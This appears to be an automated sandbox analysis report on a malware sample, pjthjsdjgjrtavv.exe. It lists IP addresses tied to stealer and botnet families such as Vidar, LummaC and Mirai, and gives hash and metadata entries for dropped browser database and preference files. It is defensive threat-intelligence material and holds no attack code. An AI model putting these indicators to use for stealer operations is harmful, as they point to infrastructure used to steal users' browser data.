• Number of executed functions: 66
• Number of non-executed functions: 36
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted)
• Excluded domains from analysis (whitelisted)
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
No simulations
                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              HETZNER-ASDEfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                                                                              arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                                              • 167.233.43.233
                                                                                                                                                                                                                                                                              x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                                              • 5.9.64.77
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                              • 94.130.191.168
                                                                                                                                                                                                                                                                              t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 213.239.239.164
                                                                                                                                                                                                                                                                              2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 168.119.31.126
                                                                                                                                                                                                                                                                              x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                              • 136.243.197.146
                                                                                                                                                                                                                                                                              sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                              • 5.9.225.47
                                                                                                                                                                                                                                                                              pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.130.191.168
                                                                                                                                                                                                                                                                              QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.130.191.168
                                                                                                                                                                                                                                                                              AKAMAI-ASN1EU8ZVMneG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 172.234.241.24
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              https://whtt.termlicari.ru/HnkNbg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 2.16.168.119
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                              • 184.51.149.224
                                                                                                                                                                                                                                                                              x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                              • 23.13.125.21
                                                                                                                                                                                                                                                                              QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 2.16.158.73
                                                                                                                                                                                                                                                                              pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 23.219.82.40
                                                                                                                                                                                                                                                                              QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 23.44.203.15
                                                                                                                                                                                                                                                                              R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 23.44.203.84
                                                                                                                                                                                                                                                                              No context
Process: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
File Type: SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 98304
Entropy (8bit): 0.08235737944063153
Encrypted: false
SSDEEP: 12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5: 369B6DD66F1CAD49D0952C40FEB9AD41
SHA1: D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256: 14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512: 771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious: false
Process: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
File Type: ASCII text, with very long lines (1024), with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.698999446679606
Encrypted: false
SSDEEP: 24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
MD5: 73351F70BFEF33BEEA9E1CC192801D02
SHA1: ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
SHA-256: F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
SHA-512: 56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
Malicious: false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):196608
                                                                                                                                                                                                                                                                              Entropy (8bit):1.265412664866743
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:KrJ/2qOB1nxCkMWSAELyKOMq+8HKkjucswRv8p3nVum8:K0q+n0JW9ELyKOMq+8HKkjuczRv894
                                                                                                                                                                                                                                                                              MD5:82F001CC76E2292FDE843BBEB1818D50
                                                                                                                                                                                                                                                                              SHA1:CC7726E0FF5759FA7ADD298DEFB2E92AB2119E2A
                                                                                                                                                                                                                                                                              SHA-256:5EC2B9101FCC9046C56BD9ADC05811E2367F98DFE3652132B65F37B80EEBBAD4
                                                                                                                                                                                                                                                                              SHA-512:AF1A9468FE607FE703BFBF31F58C3A949F43BC08D477F855227B186881E7EA60403DA345B6DD44E2D6D08C961B6CABD8609BD6D6E8141F647F1EDA449C72E63E
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1769), with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):9370
                                                                                                                                                                                                                                                                              Entropy (8bit):5.514140640374404
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
                                                                                                                                                                                                                                                                              MD5:7E44458E0A8A3A7D10875BC3B7AE72D1
                                                                                                                                                                                                                                                                              SHA1:E5E6AC8676EE3761DAB13A10EB7573C19F48D297
                                                                                                                                                                                                                                                                              SHA-256:21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
                                                                                                                                                                                                                                                                              SHA-512:012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                                                                                                              Entropy (8bit):4.698999446679606
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
                                                                                                                                                                                                                                                                              MD5:73351F70BFEF33BEEA9E1CC192801D02
                                                                                                                                                                                                                                                                              SHA1:ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
                                                                                                                                                                                                                                                                              SHA-256:F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
                                                                                                                                                                                                                                                                              SHA-512:56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):159744
                                                                                                                                                                                                                                                                              Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                              MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                              SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                              SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                              SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                                                                                                              Entropy (8bit):4.691266297898928
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                                                                                                                                                                                              MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                                                                                                                                                                                              SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                                                                                                                                                                                              SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                                                                                                                                                                                              SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):294912
                                                                                                                                                                                                                                                                              Entropy (8bit):0.08441928760034874
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vI:51zkVmvQhyn+Zoz67V
                                                                                                                                                                                                                                                                              MD5:2ABDC5DBC05C0C5CE5E1EB6D6E8C1B0D
                                                                                                                                                                                                                                                                              SHA1:14DFBE9B28D033542357D98005239D842A16FCFD
                                                                                                                                                                                                                                                                              SHA-256:91F1008439BD28B09EC1FC851F2679DFBAA45B27409882AD899CEF8460A036AF
                                                                                                                                                                                                                                                                              SHA-512:DD4BD1407DFDC90BC97F5940A120CCDE7D4A6DAA3E0DB1649BED96EBE52FFDF879E52E028657F954FF39A93EEE8F57694A7EAC55D85CA57AF2BBD7A7793B9030
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):155648
                                                                                                                                                                                                                                                                              Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                              MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                              SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                              SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                              SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                                                                                                              Entropy (8bit):4.691266297898928
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                                                                                                                                                                                              MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                                                                                                                                                                                              SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                                                                                                                                                                                              SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                                                                                                                                                                                              SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                                                                                              Entropy (8bit):1.137181696973627
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                                                                                                                                                                                                              MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                                                                                                                                                                                                              SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                                                                                                                                                                                                              SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                                                                                                                                                                                                              SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):51200
                                                                                                                                                                                                                                                                              Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):57717
                                                                                                                                                                                                                                                                              Entropy (8bit):6.103799756709965
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:z/Ps+wsI7yOrPGWv/sxtwKj7VLyMV/YoskFoz:z/0+zI7yOzv/4KcVeZoskG
                                                                                                                                                                                                                                                                              MD5:510FBDA13BE4DE3D096CF3F928364F5B
                                                                                                                                                                                                                                                                              SHA1:8956A50FCADE441FBA00D554B38779E3A5548717
                                                                                                                                                                                                                                                                              SHA-256:DF775663A9B2A1661C70174E87F00BEEAB97BE9C1A10D5F13F8F49AFF1527218
                                                                                                                                                                                                                                                                              SHA-512:4C3FF6933C88FA751FEDB8B6B8674D65AAFFEB255AD40228D6B31C00D921EF310E3B97B886EA4AECD3F200C87C2193AB404922B2B2688F3EFBA12FDDC5EF714D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                              Size (bytes):59005
                                                                                                                                                                                                                                                                              Entropy (8bit):6.100662859821733
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:LMk1rT8HnnSPGWv/sxtwKVOFof7VLyMV/YosI:LMYrT8HGv/4KeuAVeZosI
                                                                                                                                                                                                                                                                              MD5:19A2A8B6898019099F0A850C02878012
                                                                                                                                                                                                                                                                              SHA1:7C26C02B399ACA42339D2E3769891260DDF725DB
                                                                                                                                                                                                                                                                              SHA-256:87F8AECDC7C896ECE5D6E682AA3DAFFF51321770F0B6CAF8FB67ED96AE08DD79
                                                                                                                                                                                                                                                                              SHA-512:02857348E8F28B3A77DFC1F0DFF6403DE26F42B6C2B8FA6B00ED07593721A538B4D6F6846FD830E9281AB6D92A82C7D290E18B34ACA344A6E8D10EF58573A59F
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"5164b344-c4ed-43b8-ad53-2b912e4423f7"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):58881
                                                                                                                                                                                                                                                                              Entropy (8bit):6.100713292360589
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:LMk1rT8H1akPGWv/sxtwKVOFof7VLyMV/YosI:LMYrT8VVv/4KeuAVeZosI
                                                                                                                                                                                                                                                                              MD5:08AC783094DC006699B54503012CF56B
                                                                                                                                                                                                                                                                              SHA1:7FD59014E4156A52EA68B4DDCF61F457508C46A7
                                                                                                                                                                                                                                                                              SHA-256:416A6FEBF5C990C775AB3CBDD855343B70AABD28F4823E1911BF3443EBC93E04
                                                                                                                                                                                                                                                                              SHA-512:D4E4BC7FE7F635A3AC46B251E1B886E731E8E5585C151F723EA0417F801398E6F6F8747DC01575D8DC84E2F814EA1C1B7D3CB02A324E11CBC492115E9FB87DA4
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"5164b344-c4ed-43b8-ad53-2b912e4423f7"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):58928
                                                                                                                                                                                                                                                                              Entropy (8bit):6.1005968734066265
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:LMk1rT8H1aoPGWv/sxtwKVOFof7VLyMV/YosI:LMYrT8VDv/4KeuAVeZosI
                                                                                                                                                                                                                                                                              MD5:EDA204049A355F491F78D4E372695390
                                                                                                                                                                                                                                                                              SHA1:52C553607E5EE3BD1A3CB342E8A89687FA08A016
                                                                                                                                                                                                                                                                              SHA-256:084BE77855B30F9B518CAA1DF08672F4BEB8EA0CE5E7306019B94014C5A44CD7
                                                                                                                                                                                                                                                                              SHA-512:A313415ACD5130AC6D5732B1CB6492657019E8DE480C8F16E4FD30B3594ECFDE2F70C0B248B72ED8BF001D8D5B2E5AED996B59A8BD2D9CD8C48758752985233A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"5164b344-c4ed-43b8-ad53-2b912e4423f7"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):59005
                                                                                                                                                                                                                                                                              Entropy (8bit):6.100691246768904
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:LMk1rT8Hna9MPGWv/sxtwKVOFof7VLyMV/YosI:LMYrT8HBv/4KeuAVeZosI
                                                                                                                                                                                                                                                                              MD5:1975260E752A4F4E49CA2A31FAECB0D8
                                                                                                                                                                                                                                                                              SHA1:EBC57CF4B7E05D3BE859DD9FA700402ACB73399A
                                                                                                                                                                                                                                                                              SHA-256:49D1DAE69FAA015ED0DCE4CE8DCCDAC839094AE8C4EE37BFC5A7703D26D2AA91
                                                                                                                                                                                                                                                                              SHA-512:2B848B5783E1D9FE1FB63DA42484E60CCC422720EC1BBA0F46263147CCC3CFAAE0CF50E9823D3DEAEE31BCCB68A76B98367C831E67DA7AF15806C4E3D00F6A8A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"5164b344-c4ed-43b8-ad53-2b912e4423f7"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):57639
                                                                                                                                                                                                                                                                              Entropy (8bit):6.103549110629139
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:z/Ps+wsI7ynSPGWv/sxtwfj7VLyMV/YoskFoz:z/0+zI7ynGv/4KnVeZoskG
